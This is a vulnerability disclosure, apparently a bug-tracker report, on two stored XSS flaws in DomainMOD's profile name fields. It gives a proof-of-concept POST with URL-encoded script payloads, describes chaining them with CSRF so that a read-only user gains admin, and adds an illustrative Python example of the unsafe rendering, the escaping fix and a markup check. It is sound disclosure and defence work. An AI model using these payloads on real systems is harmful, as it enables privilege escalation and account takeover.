There are two Stored XSS vulnerabilities.
A read-only user can use the Stored XSS together with CSRF to add an administrator account, change the read-only user to admin, or change the admin password……
PoC:
After the read-only user logs in:
POST URL: https://demo.domainmod.org/settings/profile/
POST data: new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0
Then, when the admin logs in and opens the URL https://demo.domainmod.org/admin/users/, the JavaScript will execute. Combined with the CSRF vulnerability (#65), a read-only user can add an administrator account, change the read-only user to admin, or change the admin password……
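The following is an added illustration, not DomainMOD's own code: it decodes the POST body from the report, shows why concatenating the stored first/last name into the admin user list executes the script, and shows the output-encoding fix. The row-rendering functions and the `contains_markup` check are assumed, illustrative stand-ins for the real templates.

```python
# Added example (not DomainMOD's code): decode the reported profile POST,
# render it unsafely and safely, and flag markup in name fields.
from urllib.parse import parse_qs
import html

# The POST body quoted in the report, embedded here as constructed sample input.
POST_BODY = (
    "new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E"
    "&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F2222%2F%29%3C%2Fscript%3E"
    "&new_email_address=test%40test.com&new_currency=USD"
    "&new_timezone=Canada%2FPacific&new_expiration_emails=0"
)


def parse_profile_post(body: str) -> dict:
    """Decode the form body into plain field values, as the server stores them."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_user_row_unsafe(first: str, last: str) -> str:
    """Vulnerable pattern (hypothetical): stored values concatenated straight into HTML."""
    return f'<td title="{first} {last}">{first} {last}</td>'


def render_user_row_safe(first: str, last: str) -> str:
    """Hardened pattern: encode on output; quote=True also covers the attribute context."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    return f'<td title="{esc(first)} {esc(last)}">{esc(first)} {esc(last)}</td>'


def contains_markup(value: str) -> bool:
    """Cheap server-side check for a profile name carrying HTML/script characters."""
    return any(ch in value for ch in '<>"')


if __name__ == "__main__":
    fields = parse_profile_post(POST_BODY)
    print(fields["new_first_name"])  # test"><script>alert(/1111/)</script>
    print(render_user_row_unsafe(fields["new_first_name"], fields["new_last_name"]))
    print(render_user_row_safe(fields["new_first_name"], fields["new_last_name"]))
```

Encoding at render time neutralises the stored payload even if the profile form never validated it; the `contains_markup` check is a defence-in-depth signal, not a replacement for output encoding.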